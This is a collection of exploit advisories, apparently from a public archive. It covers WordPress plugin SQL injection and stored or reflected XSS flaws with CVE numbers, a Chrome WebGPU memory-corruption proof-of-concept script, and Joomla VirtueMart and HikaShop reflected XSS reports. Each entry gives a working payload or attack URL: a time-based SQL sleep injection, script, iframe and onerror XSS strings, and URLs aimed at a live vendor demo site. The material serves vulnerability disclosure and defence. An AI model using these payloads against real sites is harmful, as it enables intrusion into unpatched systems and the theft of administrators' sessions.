<pre><code>Tittle:<br />WordPress Plugin WP Brutal AI < 2.0.0 - SQL Injection via CSRF<br /><br />References:<br />CVE-2023-2601<br /><br />Author:<br />Taurus Omar <br /><br />Description:<br />The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by admin via CSRF.<br /><br />Affects Plugins:<br />WP Brutal AI - Fixed in version 2.0.0<br /><br />Proof of Concept:<br /><br />When there is a created campaign, access the following link as an admin:<br /><br />https://example.com/wp-admin/admin.php?page=viewwpbrutalaicampaign&id=1+and+sleep%2815%29 <br /><br />Classification:<br />Type SQLi <br />OWASP top 10 A1: Sql Injection (SQLi)<br />CWE-89<br /><br />wpScan:<br />https://wpscan.com/vulnerability/57769468-3802-4985-bf5e-44ec1d59f5fd<br /></code></pre>
<pre><code>Tittle:<br />WordPress Plugin SEO ALert <= 1.59 - Admin+ Stored XSS<br /><br /><br />References:<br />CVE-2023-2225<br /><br />Author:<br />Taurus Omar <br /><br />Description:<br />The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).<br /><br />Affects Plugins:<br />SEO ALert - No known fix - plugin closed<br /><br />Proof of Concept:<br /><br />1. Go to Vanilla Beans » SEO Alert.<br /> <br />2. In "Slack Alert for" » "Slack Channel" add payload: "><audio src=x onerror=confirm("XSS")><br /> <br />3. Save to get the XSS trigger. <br /><br />Classification:<br />Type XSS <br />OWASP top 10 A7: Cross-Site Scripting (XSS)<br />CWE-79<br /><br />wpScan:<br />https://wpscan.com/vulnerability/0af475ba-5c02-4f62-876d-6235a745bbd6<br /></code></pre>
<pre><code>Tittle:<br />WordPress Plugin PrePost SEO <= 3.0 - Admin + Stored Cross-Site Scripting<br /><br /><br />References:<br />CVE-2023-2029<br /><br />Author:<br />Taurus Omar <br /><br />Description:<br />The plugin does not properly sanitize some of its settings, which could allow high-privilege users to perform Stored Cross-Site Scripting (XSS) attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)<br /><br />Affects Plugins:<br />PrePost SEO - No known fix - plugin closed<br /><br />Proof of Concept:<br /><br />1. Add XSS payload to plugin's "Account API key" setting: "><iframe src="<svg onload=alert(4);>"><br /><br />2. Save and see XSS exploit. <br /><br /><br />Classification:<br />Type XSS <br />OWASP top 10 A7: Cross-Site Scripting (XSS)<br />CWE-79<br /><br />wpScan:<br />https://wpscan.com/vulnerability/4889ad5a-c8c4-4958-b176-64560490497b<br /></code></pre>
<pre><code>Tittle:<br />WordPress Plugin Tablesome < 1.0.9 - Reflected XSS<br /><br />References:<br />CVE-2023-1890<br /><br />Author:<br />Taurus Omar <br /><br />Description:<br />The plugin does not escape various generated URLs, before outputting them in attributes when some notices are displayed, leading to Reflected Cross-Site Scripting<br /><br />Affects Plugins:<br />Tablesome - Fixed in version 1.0.9<br /><br />Proof of Concept:<br />Make a logged in admin open one of the URL below when the feature/tracking notice has not been dismissed yet<br /><br />https://example.com/wp-admin/edit.php?post_type=tablesome_cpt&a%22%3E%27%3E%3Cdetails%2Fopen%2Fontoggle%3Dconfirm%28%27XSS%27%29%3E<br />https://example.com/wp-admin/edit.php?post_type=tablesome_cpt&tablesome_feature_notice_dismissed=1&</script><script>alert(/XSS/)</script><br />https://example.com/wp-admin/edit.php?post_type=tablesome_cpt&can_track_tablesome_events=1&</script><script>alert(/XSS/)</script> <br /><br />Classification:<br />Type XSS <br />OWASP top 10 A7: Cross-Site Scripting (XSS)<br />CWE-79<br /><br />wpScan:<br />https://wpscan.com/vulnerability/8ef64490-30cd-4e07-9b7c-64f551944f3d<br /></code></pre>
<pre><code>Tittle:<br />WordPress Plugin Login Rebuilder < 2.8.1 - Admin+ Stored XSS<br /><br /><br />References:<br />CVE-2023-2223<br /><br />Author:<br />Taurus Omar <br /><br />Description:<br />The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).<br /><br />Affects Plugins:<br />Login Rebuilder - Fixed in version 2.8.1<br /><br />Proof of Concept:<br /><br />1. Go to Settings » Login rebuilder<br /> <br />2. In Login file keyword, add payload: "><iframe src="<svg onload=alert(4);>"><br /> <br />3. Save the changes to trigger XSS. <br /><br /><br />Classification:<br />Type XSS <br />OWASP top 10 A7: Cross-Site Scripting (XSS)<br />CWE-79<br /><br />wpScan:<br />https://wpscan.com/vulnerability/7b356b82-5d03-4f70-b4ce-f1405304bb52<br /></code></pre>
<pre><code>Tittle:<br />WordPress Plugin Seo By 10Web < 2.8.1 - Admin+ Stored XSS<br /><br /><br />References:<br />CVE-2023-2224<br /><br />Author:<br />Taurus Omar <br /><br />Description:<br />The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).<br /><br />Affects Plugins:<br />Seo By 10Web - Fixed in version 1.2.7<br /><br />Proof of Concept:<br /><br />1. Go to SEO by 10Web » Sitemap section.<br /><br />2. And new URL to the page.<br /><br />3. Add XSS payload: "><audio src=x onerror=confirm("XSS")><br /><br />4. Save to trigger the XSS. <br /><br /><br />Classification:<br />Type XSS <br />OWASP top 10 A7: Cross-Site Scripting (XSS)<br />CWE-79<br /><br />wpScan:<br />https://wpscan.com/vulnerability/a76b6d22-1e00-428a-8a04-12162bd0d992<br /></code></pre>
<pre><code>Tittle:<br />WordPress Plugin Login Configurator <= 2.1 - Reflected Cross-Site Scripting<br /><br />References:<br />CVE-2023-1893<br /><br />Author:<br />Taurus Omar <br /><br />Description:<br />The plugin does not properly escape a URL parameter before outputting it to the page, leading to a reflected cross-site scripting vulnerability targeting site administrators.<br /><br />Affects Plugins:<br />Login Configurator - No known fix - plugin closed<br /><br />Proof of Concept:<br /><br />Visit the following path:<br /><br />/wp-admin/options-general.php?page=login-configurator-options&tab=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E#top <br /><br /><br />Classification:<br />Type XSS <br />OWASP top 10 A7: Cross-Site Scripting (XSS)<br />CWE-79<br /><br />wpScan:<br />https://wpscan.com/vulnerability/dbe6cf09-971f-42e9-b744-9339454168c7<br /></code></pre>
<pre><code><script><br />/*<br />Google Chrome WebGPU Memory Corruption<br />Author: Jean Pereira <pereira.one.010@gmail.com><br />Released: 2023/06/25<br />Vendor: https://www.google.com<br />Software: https://www.google.com/chrome/<br />Tested with version: 115.0.5790.102 (latest version)<br />*/<br /><br />navigator.gpu.requestAdapter().then(a => {<br /> a.requestDevice().then(d => {<br /> const b = d.createBuffer({<br /> mappedAtCreation: true,<br /> size: 0x1000,<br /> usage: GPUBufferUsage.MAP_WRITE,<br /> })<br /><br /> function asm(s, a, b) {<br /> 'use asm'<br /> var arr = new s.Uint32Array(b)<br /><br /> function nop(x) {<br /> x = x | 0<br /> }<br /> return nop<br /> }<br /><br /> asm({<br /> Uint32Array: Uint32Array<br /> }, {}, b.getMappedRange())<br /><br /> b.destroy()<br /> })<br />})<br /></script><br /></code></pre>
<pre><code># Exploit Title: Joomla VirtueMart Shopping-Cart 4.0.12 - Reflected XSS<br /># Exploit Author: CraCkEr<br /># Date: 24/07/2023<br /># Vendor: VirtueMart Team<br /># Vendor Homepage: https://www.virtuemart.net/<br /># Software Link: https://demo.virtuemart.net/<br /># Joomla Extension Link: https://extensions.joomla.org/extension/e-commerce/shopping-cart/virtuemart/<br /># Tested on: Windows 10 Pro<br /># Impact: Manipulate the content of the site<br /><br /><br /><br />## Greetings<br /><br />The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka <br />CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /><br /><br /><br />## Description<br /><br />The attacker can send to victim a link containing a malicious URL in an email or instant message<br />can perform a wide variety of actions, such as stealing the victim's session token or login credentials<br /><br /><br /><br />Path: /product-variants<br /><br />GET parameter 'keyword' is vulnerable to RXSS<br /><br />https://website/product-variants?keyword=[XSS]&view=category&option=com_virtuemart&virtuemart_category_id=11&Itemid=925<br /><br /><br />[XSS Payload]: uk9ni"><script>alert(1)</script>a6di2<br /><br /><br /><br />[-] Done<br /></code></pre>
<pre><code># Exploit Title: Joomla HikaShop 4.7.4 - Reflected XSS<br /># Exploit Author: CraCkEr<br /># Date: 24/07/2023<br /># Vendor: Hikari Software Team<br /># Vendor Homepage: https://www.hikashop.com/<br /># Software Link: https://demo.hikashop.com/index.php/en/<br /># Joomla Extension Link: https://extensions.joomla.org/extension/e-commerce/shopping-cart/hikashop/<br /># Tested on: Windows 10 Pro<br /># Impact: Manipulate the content of the site<br /><br /><br /><br />## Greetings<br /><br />The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka <br />CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /><br /><br /><br />## Description<br /><br />The attacker can send to victim a link containing a malicious URL in an email or instant message<br />can perform a wide variety of actions, such as stealing the victim's session token or login credentials<br /><br /><br /><br />Path: /index.php<br /><br />GET parameter 'from_option' is vulnerable to RXSS<br /><br />https://website/index.php?option=com_hikashop&ctrl=product&task=filter&tmpl=raw&filter=1&module_id=102&cid=2&from_option=[XSS]&from_ctrl=product&from_task=listing&from_itemid=103<br /><br /><br />Path: /index.php<br /><br />GET parameter 'from_ctrl' is vulnerable to RXSS<br /><br />https://demo.hikashop.com/index.php?option=com_hikashop&ctrl=product&task=filter&tmpl=raw&filter=1&module_id=102&cid=2&from_option=com_hikashop&from_ctrl=[XSS]&from_task=listing&from_itemid=103<br /><br /><br />Path: /index.php<br /><br />GET parameter 'from_task' is vulnerable to RXSS<br /><br />https://demo.hikashop.com/index.php?option=com_hikashop&ctrl=product&task=filter&tmpl=raw&filter=1&module_id=102&cid=2&from_option=com_hikashop&from_ctrl=product&from_task=[XSS]&from_itemid=103<br /><br /><br />Path: /index.php<br /><br />GET parameter 'from_itemid' is vulnerable to RXSS<br /><br />https://demo.hikashop.com/index.php?option=com_hikashop&ctrl=product&task=filter&tmpl=raw&filter=1&module_id=102&cid=2&from_option=com_hikashop&from_ctrl=product&from_task=listing&from_itemid=[XSS]<br /><br /><br />[XSS Payload]: uhqum"onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"wcn46<br /><br /><br /><br />[-] Done<br /></code></pre>
